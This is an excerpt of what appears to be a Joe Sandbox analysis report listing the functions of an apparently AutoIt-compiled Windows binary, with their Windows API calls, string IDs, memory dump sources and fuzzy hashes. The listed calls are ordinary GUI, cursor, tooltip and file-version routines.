                                                            • DrawFocusRect.USER32(?,?), ref: 003EAA3D
                                                            • GetSysColor.USER32(00000011), ref: 003EAA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 003EAA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003EAA67
                                                            • SelectObject.GDI32(?,003EA5FA), ref: 003EAA7E
                                                            • DeleteObject.GDI32(?), ref: 003EAA89
                                                            • SelectObject.GDI32(?,?), ref: 003EAA8F
                                                            • DeleteObject.GDI32(?), ref: 003EAA94
                                                            • SetTextColor.GDI32(?,?), ref: 003EAA9A
                                                            • SetBkColor.GDI32(?,?), ref: 003EAAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 74f7a3357eae812d39fab1f2682ab6901f1d74ca7c691bf4fc230b653cc192bc
                                                            • Instruction ID: 50d1458001a82b424cee2a74a2b1d6dea80c7ad36ca65aa070025a3583d1a12d
                                                            • Opcode Fuzzy Hash: 74f7a3357eae812d39fab1f2682ab6901f1d74ca7c691bf4fc230b653cc192bc
                                                            • Instruction Fuzzy Hash: 7F514D71900658EFDF229FA5DC88EAE7B79EB48320F114225F911AB2E1D7B1A940DF50
                                                            Function 003E89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003E8AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8AD2
                                                            • CharNextW.USER32(0000014E), ref: 003E8B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003E8B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003E8B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003E8B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 003E8BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003E8BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E8C1F
                                                            • _memset.LIBCMT ref: 003E8C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003E8C8D
                                                            • _memset.LIBCMT ref: 003E8CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003E8D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 003E8D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 003E8E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003E8E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8EB4
                                                            • DrawMenuBar.USER32(?), ref: 003E8EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 003E8EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 8c718192141e7a960c957a81fbe5b805c49972cfe2922d5c219fa50c69f8fd03
                                                            • Instruction ID: 9c01809681362f92dc6fd8ee9f62f50fadf93a971d1c08ae04aa98e3226b9e81
                                                            • Opcode Fuzzy Hash: 8c718192141e7a960c957a81fbe5b805c49972cfe2922d5c219fa50c69f8fd03
                                                            • Instruction Fuzzy Hash: ECE183709002A8AFDF22DF51DC84EEE7B79EF05710F118266F919AA1D0DB709A81DF60
                                                            Function 003E488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 003E49CA
                                                            • GetDesktopWindow.USER32 ref: 003E49DF
                                                            • GetWindowRect.USER32(00000000), ref: 003E49E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003E4A48
                                                            • DestroyWindow.USER32(?), ref: 003E4A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E4A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E4ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E4AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 003E4AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E4B09
                                                            • IsWindowVisible.USER32(?), ref: 003E4B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E4B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E4B58
                                                            • GetWindowRect.USER32(?,?), ref: 003E4B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 003E4B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 003E4BB0
                                                            • CopyRect.USER32(?,?), ref: 003E4BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 003E4C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                            • Instruction ID: e6f3e9d43c9eb8eb0b8c7b7e2224a475f0739ef4e9b977f5debd5132f856826b
                                                            • Opcode Fuzzy Hash: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                            • Instruction Fuzzy Hash: 13B19C70604390AFDB15DF65C884B6ABBE8FF88310F008A2DF5999B2A1D771EC05CB55
                                                            Function 003C449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003C44AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003C44D2
                                                            • _wcscpy.LIBCMT ref: 003C4500
                                                            • _wcscmp.LIBCMT ref: 003C450B
                                                            • _wcscat.LIBCMT ref: 003C4521
                                                            • _wcsstr.LIBCMT ref: 003C452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003C4548
                                                            • _wcscat.LIBCMT ref: 003C4591
                                                            • _wcscat.LIBCMT ref: 003C4598
                                                            • _wcsncpy.LIBCMT ref: 003C45C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 2552e99d058539fdf8935676dff76d13b8911ab0b9afe4c86890c1b196ffa821
                                                            • Instruction ID: 66dccd518503e8a3bb17d9a3c42b9d48fedf45802a5dbfe21d7177ebccc87acf
                                                            • Opcode Fuzzy Hash: 2552e99d058539fdf8935676dff76d13b8911ab0b9afe4c86890c1b196ffa821
                                                            • Instruction Fuzzy Hash: 2941D371A003007BDB17BA748C42FBF776CDF42710F1005AAF905EA1C2EA74AA0197A9
                                                            Function 003627D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 003628C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 003628F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0036291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00362939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00362949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00362990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 003629AE
                                                            • GetStockObject.GDI32(00000011), ref: 003629CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 003629D5
                                                              • Part of subcall function 00362344: GetCursorPos.USER32(?), ref: 00362357
                                                              • Part of subcall function 00362344: ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                              • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000001), ref: 00362399
                                                              • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00361256), ref: 003629FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: -es$AutoIt v3 GUI
                                                            • API String ID: 1458621304-1956769002
                                                            • Opcode ID: d6b4d0b903bf39bbc738f817ac4d703cec7388e633bc44833c766905aa886d25
                                                            • Instruction ID: 8945076a3ec82916408305ea3ce2c004ddb4cb636ce93b4c45370a8739cb87f0
                                                            • Opcode Fuzzy Hash: d6b4d0b903bf39bbc738f817ac4d703cec7388e633bc44833c766905aa886d25
                                                            • Instruction Fuzzy Hash: CCB18071600609DFDF26DFA8DC85BAE77B4FB48310F118225FA15AB2D4CBB49851CB54
                                                            Function 003BA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 003BA47A
                                                            • __swprintf.LIBCMT ref: 003BA51B
                                                            • _wcscmp.LIBCMT ref: 003BA52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BA583
                                                            • _wcscmp.LIBCMT ref: 003BA5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 003BA5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 003BA648
                                                            • GetWindowRect.USER32(?,?), ref: 003BA67E
                                                            • GetParent.USER32(?), ref: 003BA69C
                                                            • ScreenToClient.USER32(00000000), ref: 003BA6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 003BA71D
                                                            • _wcscmp.LIBCMT ref: 003BA731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 003BA757
                                                            • _wcscmp.LIBCMT ref: 003BA76B
                                                              • Part of subcall function 0038362C: _iswctype.LIBCMT ref: 00383634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                            • Instruction ID: 6e2b0b6292385114928e1dfb3262b5382f731e36f3678dafd7203fcfd68fbdbb
                                                            • Opcode Fuzzy Hash: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                            • Instruction Fuzzy Hash: 76A1C471204F06AFD716DF64C885BEAB7E8FF44358F004529FA99C6590DB30EA45CB92
                                                            Function 003BAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 003BAF18
                                                            • _wcscmp.LIBCMT ref: 003BAF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 003BAF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 003BAF6E
                                                            • _wcscmp.LIBCMT ref: 003BAF8C
                                                            • _wcsstr.LIBCMT ref: 003BAF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 003BAFD5
                                                            • _wcscmp.LIBCMT ref: 003BAFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 003BB00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 003BB055
                                                            • _wcscmp.LIBCMT ref: 003BB065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 003BB08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 003BB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                            • Instruction ID: b4b482d3f0c820d0921c4ec5cbb9600f50391e2aa72949d9f4bbd9d0bd594607
                                                            • Opcode Fuzzy Hash: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                            • Instruction Fuzzy Hash: 5081CF711083059FDB12DF14C881BFAB7E8EF44718F04856AFE858A095DB74DE45CB61
                                                            Function 003EC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 003EC627
                                                              • Part of subcall function 003EAB37: ClientToScreen.USER32(?,?), ref: 003EAB60
                                                              • Part of subcall function 003EAB37: GetWindowRect.USER32(?,?), ref: 003EABD6
                                                              • Part of subcall function 003EAB37: PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EC69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EC6BE
                                                            • _wcscat.LIBCMT ref: 003EC6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EC705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC757
                                                            • DragFinish.SHELL32(?), ref: 003EC75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EC851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbB
                                                            • API String ID: 169749273-33125029
                                                            • Opcode ID: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                            • Instruction ID: ea5b79ec9e6f17c6e3483cf75f10191c6b496df521f3720c933e7497498c47fa
                                                            • Opcode Fuzzy Hash: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                            • Instruction Fuzzy Hash: 52616C71108341AFC712EF64DC85DAFBBE8EF89710F404A2EF5919A1E1DB709A49CB52
                                                            Function 003BABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                            • Instruction ID: f46f47d4be9a719d5b68257263f4a9d7883749c7063fff4da03bae8a0f8a7dfc
                                                            • Opcode Fuzzy Hash: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                            • Instruction Fuzzy Hash: EA310431A88A09A7CA12FA50DD03FEE7BB49F10794F70402AF541BA4D5EF656F048656
                                                            Function 003D4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 003D5013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 003D501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 003D5029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 003D5034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 003D503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 003D504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 003D5055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 003D5060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 003D506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 003D5076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 003D5081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 003D508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 003D5097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 003D50A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 003D50AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 003D50B8
                                                            • GetCursorInfo.USER32(?), ref: 003D50C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                            • Instruction ID: b294713da227265ecbecd523568f8528cac6d83a90b62e7c538f65537a7cbc70
                                                            • Opcode Fuzzy Hash: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                            • Instruction Fuzzy Hash: A33113B1D48319AADF119FB69C8996FBFECFF04750F50452BA50CE7280DA78A5048F91
                                                            Function 003EA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003EA259
                                                            • DestroyWindow.USER32(?,?), ref: 003EA2D3
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003EA34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003EA36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA382
                                                            • DestroyWindow.USER32(00000000), ref: 003EA3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00360000,00000000), ref: 003EA3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA3F4
                                                            • GetDesktopWindow.USER32 ref: 003EA40D
                                                            • GetWindowRect.USER32(00000000), ref: 003EA414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003EA42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003EA444
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                            • Instruction ID: 0c9f47ef533fd2e3b1a9f1444ca26df84b0923b839090c3036680a9488225e17
                                                            • Opcode Fuzzy Hash: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                            • Instruction Fuzzy Hash: FA719D70140684AFD722DF29CC49F667BE9FB88304F45462DF9859B2E0C7B4E902CB56
                                                            Function 003E4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 003E4424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
